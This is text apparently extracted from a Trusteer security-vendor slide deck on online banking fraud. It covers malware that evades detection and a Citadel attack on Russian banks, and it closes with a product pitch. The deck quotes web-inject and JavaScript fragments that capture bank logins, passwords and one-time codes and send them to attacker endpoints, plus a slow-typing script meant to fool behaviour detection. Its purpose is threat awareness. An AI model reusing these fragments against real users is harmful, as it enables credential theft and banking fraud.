online fraud: threats & trends - ibm › ru › events › presentations › cloud13 ›...

Online Fraud: Threats & Trends

Ziv Cohen

Director, EMEA Sales

Trusteer Confidential 2012 ©

Criminals Attack the Weak Link With Malware

2

Customer Accounts

Cyber Criminals

Difficult

Easy

Easy

Retail/Business Customer


Protect Your Investment

Two emerging trends for malware:

Back to the basics tactics: reviving old techniques to bypass security solutions

Malware security: investing in malware protection from: - Malware detection systems

- Anomaly detection systems

- Behavior profiling systems

- Device ID solutions

- And more…

Cybercrime forum trends – more services that help outsource technical aspects of fraud

3


Evading Detection (Wrapper)

4


Evading Detection

5


Undetectable to AVs

6


Undetectable to AVs

7


Bypassing Device ID (RDP)

Notification

Login

Injection


Bypassing Device ID (RDP)

RDP

Transaction


Bypassing Device ID


Behavior Anomaly Evasion

slow_fill = function(id, text) { var i=1; beepInput(id); var thread=setInterval( function() { id.value=text.substr(0,i); i++; if (i==text.length+1) { clearInterval(thread); deleteHelpMessage(); } } , 200); }


Russian Banks Targeted by Malware

12

The attacker:

Citadel – a descendant of Zeus

MITB functionality

The targets:

VTB24 (/WebNew/login.aspx)

Russian Standard Bank (rsb.ru)

Avangard Bank (avangard.ru)

The method:

Steal credentials

Steal OTPs

HTML Injection

Real time victim-to-cybercriminal communications


Example of attack flow

13

Capture credentials in real time

The malware checks the credentials validity

Communicate with the user

Credentials are sent to the C&C in real time via Jabber

Cybercriminal logs in using the credentials, after pausing the victim

<WebInject> <Before><![CDATA[<input name="TextBoxPassword" type="password" size="6" id="TextBoxPassword" class="text"]]></Before> <After><![CDATA[]]></After> <Data><![CDATA[ onkeypress="if(event.keyCode == 13) return false;"]]></Data> </WebInject>

function Check(){ if(login.value.length > 3 && pass.value.length > 3) { write_c('login',login.value,3); write_c('pass',pass.value,3); check_block(); } }

Пожалуйста , ожидайте . Происходит Авторизация!

function KnockToAdmin() {var link = log_link+"?log="+read_c('login')+"&pass="+read_c('pass')+"&tan="+tan.value; GetDataACD_knock_to_admin(link); } function SendMsg(msg) { var link = jabb_link+'?log='+msg; GetDataACD_sendmsg(link); }

function WaitForBlock() { var link = admin_logs+read_c('login')+'/block.me'; GetDataACD_WaitForBlock(link); } function WaitForNextCode() { var link = admin_logs+read_c('login')+'/kod.2'; GetDataACD_WaitForNextCode(link); } function WaitForFreeUse() { var link = admin_logs+read_c('login')+'/free.use'; GetDataACD_WaitForFreeUse(link); } function OnLoadACD_check_block() {

http://block.me/


Fraud as a Service An Identity is Born


Fraud as a Service Create A New Account

Selling bank accounts packages: • Bank account information + ATM card • Online banking credentials • Official documents (including passports) • Price: 12,000 Ruble (~$360) Also offering a cashout service for a 5% fee


Fraud as a Service

"Will buy a Corporate identity in one of the following countries" A corporate identity is an identity, online or real, which is authorized to perform changes and transfers in a corporate bank account.

I'm interested in credentials. Can be mixed countries, with United Arab Emirates, also interested in Poland, Italy, Netherlands


Too Lazy?

18


Security Silos FAIL!

Trusteer Confidential 2013 © 20

Holistic Approach for Cybercrime

WWW

Phishing and Malware Fraud

Advanced Threats (Employees)

Online/Mobile Banking

Money, Intellectual Property, Business Data

Account Takeover, New Account Fraud

Mobile Fraud Risk


Trusteer Cybercrime Prevention Architecture

Compact software agent that prevents malware and Phishing attacks

Endpoint solutions for detecting malware, jailbreak, and other mobile risk factors

Out-of-Band Authentication

100% accurate clientless detection of active MitB malware on users’ devices

Conclusive criminal access detection by correlating device fingerprint and account compromise history

Trusteer Rapport PC/Mac

Trusteer Mobile iOS, Android

Trusteer Pinpoint Malware Detection

Trusteer Pinpoint ATO Detection

Centralized Management, Alerting, Reporting

21

Thank You

online fraud: threats & trends - ibm › ru › events › presentations › cloud13 ›...

Documents